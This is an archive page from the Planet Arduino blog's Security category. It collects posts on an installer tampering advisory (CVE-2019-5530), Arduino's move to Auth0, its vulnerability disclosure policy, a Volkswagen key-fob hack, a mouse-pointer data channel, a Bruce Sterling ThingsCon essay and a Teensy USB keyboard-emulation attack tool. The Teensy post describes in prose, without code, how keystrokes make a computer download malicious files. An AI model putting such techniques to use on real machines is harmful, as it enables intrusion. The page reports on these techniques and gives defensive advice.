Posts | Comments

Planet Arduino

Archive for the ‘Security’ Category

Arduino Create Agent is a plug-in that was designed to help Arduino users connect their devices to the Arduino Create platform. The plug-in lets your browser communicate with your device’s serial port from a web application.  

We chose Bitrock’s InstallBuilder, a powerful and easy to use cross-platform installer creation tool, for generating the Arduino Create Agent installers (Windows, macOS, Linux). Those binaries are then served through our global CDN.

Yesterday, Bitrock has published an important security advisory in which they stated that Windows binaries generated with InstallBuilder versions earlier than 19.7.0 are vulnerable to tampering even if they contain a valid Authenticode signature. A specially crafted payload can be appended to an existing installer and trick the installer initialization code to execute code included in it, while the existing signature remains valid.

The issue, originally reported to them by Youfu Zhang of Chaitin Security Research Lab (@ChaitinTech), got addressed by releasing an updated version of InstallBuilder so all their customers could re-build and re-release their installers. CVE-2019-5530 has been assigned to this issue (CVSSv3 score of 6.7).

Once we’ve been notified, and given the potential impact of this security issue, we worked around the clock to re-build and re-release our Agent’s Windows installer. Version 1.1.89 has now been released through our official channels.

Please note that all versions of the Windows installer before version 1.1.89 are vulnerable to CVE-2019-5530.

Because this issue can be exploited with existing binaries already released, we also want to remind all of you to only download installers from official sources.

If you have any questions regarding this security issue, or if you need any help with upgrading your installer, please do not hesitate to contact Arduino Support through e-mail at support@arduino.cc.

We are excited to announce that we’ve selected Auth0 as the identity management platform of choice for Arduino. We will replace our own Single Sign On solution with Auth0 for all public facing web properties, including Arduino Create and other apps.

We discovered that our own homegrown authentication solution would not scale to meet the rapidly developing needs of the growing global community and decided to reach out to Auth0. In addition to Single Sign On, Arduino will take advantage of Auth0’s new Universal Login, which enables developers to completely customise their branded authentication experiences quickly, and Device Flow for browserless or input-constrained devices.

“We wanted a robust platform to replace our SSO solution but also give us the flexibility to do cool, new things in the device authentication space. Auth0 is a brand we admire, and their API-based approach makes it easy to migrate our login data in a way that’s completely transparent for the customer. We are excited to welcome them to our global community.” – Gianluca Varisco, Arduino CISO

We plan to leverage the power of both communities and events, and explore a technical partnership in the IoT domain. Auth0 currently secures more than 2.5 billion logins per month for 21 million users.

“I have been using Arduino for years as the brain for my personal projects, so working with them in a business capacity is really rewarding. When you empower the developer with simple, powerful tools, the whole business benefits. We are excited by the reach of the Arduino community and aligned in our mission to help the developer in their journey to innovate.” – Eugenio Pace, Auth0 CEO and co-founder 

A little less than a month ago, I joined Arduino as their Chief Information Security Officer. I’ve been in touch with the team for the past couple of months and feel incredibly lucky to be part of such a talented and driven group of people.

We’re working hard on developing a robust, well-rounded security program that fits our organisation and busy improving our security posture across all departments. I am a true believer that it all starts from introducing a strong culture of security awareness — where employees feel confident and empowered to take action against security issues.  

Today, I’m thrilled to announce the first release of Arduino’s Coordinated Vulnerability Disclosure (CVD) Policy.

We used some great references when putting it together and we’d like to give them a shout out here: HackerOne’s VDP guidelines, CEPS’ report on “Software Vulnerability Disclosure in Europe,” and the US DoJ Cyber Security unit’s VDP framework. We also took into consideration recent Senate testimony of experts in vulnerability disclosure in the role hackers can play in strengthening security, Dropbox’s announcement on protecting researchers and 18F’s own policy. I even wanted to publicly thank Amit Elazari Bar On, a doctoral law candidate (J.S.D.) at UC Berkeley School of Law and a Lecturer at UC Berkeley School of Information Master in Cybersecurity program for her useful advices and for providing the amazing “#legalbugbounty” standardisation project.

We’re also happy to announce that all of the text in our policy is a freely copyable template. We’ve done this because we’d like to see others take a similar approach. We’ve put some effort in to this across our teams and if you like what you see, please use it. Similarly, if you have improvements to suggest, we’d love to hear from you.

What is CVD?

Coordinated vulnerability disclosure (CVD) is a process aimed at mitigating/eradicating the potential negative impacts of vulnerabilities. It can be defined as “the process of gathering information from vulnerability finders, coordinating the sharing of that information between relevant stakeholders, and disclosing the existence of vulnerabilities and their mitigation to various stakeholders, including the public.”

Figure 1: Relationships among actors in the CVD process. Source: “The CERT Guide to Coordinated Vulnerability Disclosure,” Software Engineering Institute, Carnegie Mellon University

Why is it important for us?

At Arduino, we consider the security of our systems and products a top priority. No technology is perfect, and Arduino believes that working with skilled security researchers across the globe is crucial in identifying weaknesses in any technology. We want security researchers to feel comfortable reporting vulnerabilities they’ve discovered, as set out in this policy, so that we can fix them and keep our information safe.

If you believe you’ve found a security issue in our products or services, we encourage you to notify us. We welcome working with you to resolve the issue promptly.

This policy describes how to send us vulnerability reports and how long we ask security researchers to wait before publicly disclosing vulnerabilities.

Where can I find it?

A copy of the policy is published on our Vulnerability Disclosure Policy page. The official document lives in GitHub. If you would like to comment or suggest a change to the policy, please open a GitHub issue.

Thank you for helping keep Arduino and our users safe!

— Gianluca Varisco

University of Birmingham researchers found two vulnerabilities that allow hackers to gain entry to almost all VW vehicles manufactured after 1995.A team of researchers were able to unlock and start the ignition of Volkswagen cars with just $40 of electronic components.

Read more on MAKE

The post Volkswagen Security Problems: Arduino Hack Reveals RFID Vulnerability appeared first on Make: DIY Projects and Ideas for Makers.

University of Birmingham researchers found two vulnerabilities that allow hackers to gain entry to almost all VW vehicles manufactured after 1995.A team of researchers were able to unlock and start the ignition of Volkswagen cars with just $40 of electronic components.

Read more on MAKE

The post Volkswagen Security Problems: Arduino Hack Reveals RFID Vulnerability appeared first on Make: DIY Projects and Ideas for Makers.

[Ido Gendel] was thinking about new and interesting ways to send data between devices, when he realized that the answer was right in his hand. Literally: he decided to try sending data using the mouse pointer. What he came up with was an interesting hack that uses small movements of the mouse pointer to send data at up to 1200bps, or about 150 bytes per second.

The way he did this was very, very clever. He used an Arduino Leonardo that is set to emulate a mouse, working alongside his existing mouse. This setup means that he can use his existing mouse: the system just sees the Arduino as a second mouse, and the pointer just looks a little jerky when you zoom in. That is because the Arduino is just sending tiny movements, each of which is a code that represents a nybble (4 binary bits) of data. By using both a combination of three left-right or up-down movements, he was able to create 16 movements, each of which can encode 4 bits of data. Each of these encoding movements also returns the mouse to its origin point, so the mouse doesn’t mysteriously scroll off the screen when data is being sent.

The encoding scheme used by [Ido].
The encoding scheme used by [Ido].
On the computer, a custom program detects and decodes this movement, recreating the stream of data. In his example, this is data from a photoresistor, but it could be anything from random data to the contents of a secret file.

Of course, this isn’t a practical way of sending secret data: it only works when the custom program is active, 150 bytes per second is rather slow and enabling mouse acceleration in Windows stops it working because it masks the small movement. But it is an awesome hack that shows how you can send data in ways that you might not first think of. When you are trying to make a device as simple as possible, this is an important lesson to learn.


Filed under: Arduino Hacks, peripherals hacks

All photos taken by space150.Use an Apple Watch to automagically open doors at home or at work with a tap on your wrist.

Read more on MAKE

The post Make an Apple Watch Door Unlocker appeared first on Make: DIY Projects, How-Tos, Electronics, Crafts and Ideas for Makers.

Giu
03

Secure and Track Your Bike with this Arduino-Based GPS Lock

arduino, bicycle, bike, bike lock, lock, Security, Transportation Commenti disabilitati su Secure and Track Your Bike with this Arduino-Based GPS Lock 

Riding a bike can be fun, great exercise, and, if you live in a city conducive to it, a great mode of transportation. According to author Scott Bennett who lives in Vancouver BC, Canada, a city with a high bike theft rate, he “wanted to have some peace of mind […]

Read more on MAKE

The post Secure and Track Your Bike with this Arduino-Based GPS Lock appeared first on Make:.

Mag
13

Casa Jasmina and Bruce Sterling at Thingscon 2015

arduino, bruce sterling, CasaJasmina, Featured, iot, privacy, Security, Thingscon Commenti disabilitati su Casa Jasmina and Bruce Sterling at Thingscon 2015 

hype

Bruce Sterling went to Thingscon conference with a keynote about Casa Jasmina and then published the following essay.

—————-

This is the third of my Casa Jasmina essays. It’s about the recent “ThingsCon” conference in Berlin, May 2015.

This remarkable event was the second “ThingsCon,” a new gathering which makes itself useful to the European hardware startup scene, especially “connected products” designers and builders from Berlin and London. “ThingsCon” took place in Berlin’s “Culture Brewery,” which is a huge, defunct beer factory, currently re-zoned for theaters, bars, restaurants and design retail.

Anybody who has seen the Garrone Foundry (which houses Toolbox Co-Working, Fab Lab Torino and Casa Jasmina), would surely recognize the “Culture Brewery.” It’s the same European story: the old industrial hulk remade for today’s culture-industry. So we found the ThingsCon venue to be pretty cozy, even though the stairs are of odd sizes, the huge, lofty rooms don’t fit together properly, the events and workshops are on different floors and mysteriously distant from one another, and there was excellent beer everywhere and tiny, crooked bathrooms stuck nowhere in particular. There’s something fun about this steampunk disorganization — if you’ve built a weird open-source Internet-of-Things device out of glued plywood and steel rods, it really fits that atmosphere.

ThingsCon is not a Maker Faire for the general public, and attending it is not cheap. ThingsCon is aimed at designers, developers, engineers, entrepreneurs and similar stakeholder-types from the technology ecosystem. The presentations were full of practical wisdom about commercial tech-product development: scaring up funding money, allocating time and resources, packaging, promotion, marketing, founder exit-strategies, angel investment, the issues common to people who might like to sit down for a serious talk with, say, Intel.

The organizers of ThingsCon are Peter Bihr, Simon Hoher, Emanuel Schwarz, Max Kruger, Sonja Heinen, Alexandra Deschamps-Sonsino, Brady Forrest, Louisa Heinrich, and Marcel Schouwenaar. As conference organizers go, they won’t win any prizes for sleek efficiency. However when it comes to the Internet of Things, these activists know plenty. At ThingsCon you can learn a lot in a hurry.

So: now that we understand what ThingsCon is about and who ThingsCon is meant to please, let’s confront some of their native ThingsCon problems, because they have lots of interesting issues.

The guy who delivered the first ThingsCon opening keynote, Warren Ellis, really understands their pains. Warren Ellis is pretty well known as a comic book writer, film scriptwriter and novelist, but he was also in the brain-trust of BERG,the legendary and now-dead London interaction-design firm. Warren Ellis grasps the many thorny difficulties of modern connected-product design.

Ellis delivered a sardonically funny rant, warning designers, engineers and manufacturers about the fierce wrath of genuine consumers. Consumers — (they’re the people who are supposed to buy Internet-of-Things products) — are a fickle and treacherous group. Consumers are never grateful for the hard work of designers and technicians. On the contrary, consumers are suspicious, endlessly demanding of customer support, and they resent most things they buy. The Internet-of-Things is even worse than traditional consumer capitalism, because interactive products don’t just sit there, they are invasive and intimate. People treasure their homes as a safe space in a harsh, competitive world, and they feel emotionally wounded when anything in their house betrays them.

Warren Ellis is an intelligent and erudite man, and he was telling the crowd the truth, but they were all laughing nervously because they can’t really believe what he says. It’s all true, but it’s important to understand this and still have some courage about it. If you invent and manufacture something, and it’s a commercial success and ten million people buy the product, of course your life is going to change. You won’t be a “Maker” alone in a garage any more, you’ll be an Internet multimillionaire with customer-support issues. Warren Ellis is right to urge people to think these things through: you shouldn’t dabble in technology and business unless you’re ready to face the consequences of getting what you want.

Barriers to entry in manufacturing are collapsing, so the old lines between a do-it-yourself Maker and a commercial industrialist are blurring. But this doesn’t solve old problems, it just creates interesting new ones. This was the lesson conveyed by Tina Aspiala. Before ThingsCon 2015, I had never heard of Tina Aspiala. Thanks to ThingsCon, I will pay attention to Tina Aspiala from now on.

Tina, who achieved some success with a product of hers, has become a Kickstarter patroness. Tina Aspiala spends a lot of time on Kickstarter and likes to give people some crowdfunding money just to see what happens. She told the crowd that results were mixed. Kickstarter is a funding platform, but some people on Kickstarter are crooks, they’re Kickstarter embezzlers. Other people want to be honest, but they flee in terror when they realize what the real world expects from real design and manufacturing. Others just have bad luck with their Kickstarter: they really wanted to do the work, but they broke a leg, or Dad died, or there was a divorce… that mishap wouldn’t stop FIAT or General Electric, but it does stop the Kickstarter team because they are few in number, while FIAT and General Electric have thousands of personnel.

Many Kickstarter projects get built, despite the host of problems in shipping, supply chains, material costs and manufacturing — but that doesn’t end the story. The product might be workable, but just not much good. The product might do what is promised, but the thing that the product does is only interesting once or twice, not useful in daily life. It’s a “gonzo product” (in the term created by Alexandra Deschamps-Sonsino), because it physically works and it does something, but the thing it does is eccentric and weird, so it has no commercial potential or mass appeal.

Why do we have “gonzo products” nowadays? It’s because (as Tina Aspiala pointed out), cheap electronic components make new combinations easy. Projectors, motors, sensors, cameras, processors and various wireless connectivity chips are all drastically cheaper, so product development becomes like a card game, when any gambler can connect X with Y and add some Z, then hope for a jackpot payoff.

In the case of the Internet of Things, there are many possible inputs — dozens of sensors of all kinds — but very limited outputs, because most IoT gizmos can only do very limited things to get any human attention: they blink, or beep, or vibrate. Blinking, beeping, vibrating things that demand human attention can get pretty annoying. Clearly this is a major IoT problem. Tina Aspiala recommends trying to think this situation through with some design perspective, instead of just hacking more components and attaching them to breadboards with soldering irons. That’s a point of view that makes some sense, though, let’s face it, people are gonna want to do it the easy way.

ThingsCon abounded in talks and workshops, more than I can describe here, but the most interesting thing on offer at Thingscon 2015 was the “IOT Design Manifesto”.  That’s why I’m placing the manifesto here in this post.

iotmanifesto-big
A manifesto is a sign of creative health. It’s not that I agree with the “IoT Design Manifesto” — on the contrary, if everybody agrees with a manifesto, then the manifesto is vapid and useless and hasn’t really said anything. Even a manifesto that’s completely wrong can be useful, because it motivates people to rebel and try something else. This manifesto is pretty good, in my opinion, because it’s kindly in tone and well-mannered, it confronts quite a few of the IoT’s real problems.

Even the first declarations, one and two, “We don’t believe the hype, we design useful things,” singles out the ThingsCon crowd as people who are skeptical and yet also trying to get something done. It’s a good attitude for a young industry. The other declarations are about about participation, security, privacy, data collection, association, personal agency, sustainability and humanity. These are some big, hairy issues which aren’t going to get solved in anybody’s lifetime. However, if you spend your life with the Internet of Things you’re going to be dealing with situations of that kind all the time. So, might as well get used to that prospect now.

The authors of this IoT Manifesto are Andrew Spitz, Ruben van der Vleuten, Marcel Schouwenaar, Harm van Beek, Kevin Verelst, Anner Tiete, Jan Belon, Marcel van Heist and Holly Robbins. Before I went to ThingsCon I’d never heard of any of those people, but they were right to do what they did, and I’ll be watching them with a lot more interest from now on. People tend to grow by the size of their chosen problems. These people have some pretty big problems.

I closed the ThingsCon event by asking the people there to help us with our house.

It’s a bit scary to open the faucet in this way: we don’t know if we’ll get a huge flood, or just a groan in the pipe and some dripping. If we get a lot of interest, Casa Jasmina will be crowded and noisy; if interest is more modest, we’ll try to concentrate on a few core issues. In our Internet-of-Things house, we’ll have to acquire some things, accept some things, build some things and maybe commission some things, too. The project has started deliberately, we have paced ourselves, but as the months pass, Casa Jasmina will slowly become a unique and interesting place, a true place of difference.

I wondered, in starting this project, who would ever really want to stay in such a place, and, having been to ThingsCon, I now have a much better idea about that. ThingsCon had about 300 people attending it — the “new hardware movement” are not a mass movement of millions — but those three hundred people are real people. They are bright and committed, and they really exist. If we understand them as our natural guests and we try to please them, I think we’ll do well.

Bruce Sterling

casajasmina

Gen
27

[Nikhil] has been experimenting with human interface devices (HID) in relation to security. We’ve seen in the past how HID can be exploited using inexpensive equipment. [Nikhil] has built his own simple device to drop malicious files onto target computers using HID technology.

The system runs on a Teensy 3.0. The Teensy is like a very small version of Arduino that has built-in functionality for emulating human interface devices, such as keyboards. This means that you can trick a computer into believing the Teensy is a keyboard. The computer will treat it as such, and the Teensy can enter keystrokes into the computer as though it were a human typing them. You can see how this might be a security problem.

[Nikhil’s] device uses a very simple trick to install files on a target machine. It simply opens up Powershell and runs a one-liner command. Generally, this commend will create a file based on input received from a web site controlled by the attacker. The script might download a trojan virus, or it might create a shortcut on the user’s desktop which will run a malicious script. The device can also create hot keys that will run a specific script every time the user presses that key.

Protecting from this type off attack can be difficult. Your primary option would be to strictly control USB devices, but this can be difficult to manage, especially in large organizations. Web filtering would also help in this specific case, since the attack relies on downloading files from the web. Your best bet might be to train users to not plug in any old USB device they find lying around. Regardless of the methodology, it’s important to know that this stuff is out there in the wild.


Filed under: Arduino Hacks, security hacks


  • Newsletter

    Sign up for the PlanetArduino Newsletter, which delivers the most popular articles via e-mail to your inbox every week. Just fill in the information below and submit.

  • Like Us on Facebook